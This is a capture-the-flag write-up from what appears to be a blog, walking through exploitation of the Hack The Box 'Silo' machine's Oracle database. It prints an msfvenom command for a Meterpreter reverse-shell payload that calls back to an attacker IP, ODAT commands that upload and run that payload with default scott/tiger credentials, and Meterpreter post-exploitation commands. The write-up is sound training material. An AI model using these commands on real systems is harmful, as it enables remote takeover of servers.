Pentest 2 : [htb] Silo, Exploitation Oracle

Hi All,

I would like to continue the last article about hacking Silo from hack the box PenTest box.

The last steps that we have done is the recon and enumeration phase of the penetration testing. So that we can continue with exploitation in order to gain access to the server.

We have the user and password from the last enumeration so that we can continue to exploit the server in order to gain access.

ODAT has the capability of delivering the malware to the system by accessing the capability of oracle to write a file to the system. Lets first make the exploit using msfvenom with the command below

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.73 lport=4545 -f exe > rio.exe

Lets start delivering the malware to the server using ODAT using utlfile functionality as below

So the command will look as below

/odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE –sysdba –putFile
c:/ rio.exe rio.exe

Okay we have successfully deliver our exploit to the server using the oracle write file function. we put the malware on C:/rio.exe

Now we can invoke the malware using the capability of oracle to load external table to run executable. But before we can execute the exploit let make the reverse handle using metasploit multi handler

After we have created the reverse handler then we can now invoke the exploit at the remote server. We can use ODAT command as below

./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE –sysdba c:/ rio.exe

After the ODAT has successfully execute the remote exploit we can now check the reverse handler in the metasploit that there should be one session created like below image

We can now start interacting with the established session using command

session -i 1 (1 is the session id)

meterpreter provide a lot functionality that you can use on the post exploitation, you can just type help in the meterpreter session

for example we can check who we are in the target system by using below command

meterpreter > getuid

We can see from the above picture that we are at the highest privilege account at the server that you can also query the list of privileges that you have by using this command

meterpreter > getprivs

OK that is all about the lab. finally we can hack the server and get the highest privilege. I will show you another technique that is a bit manual work but also effective for some exploitation technique in the next post.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s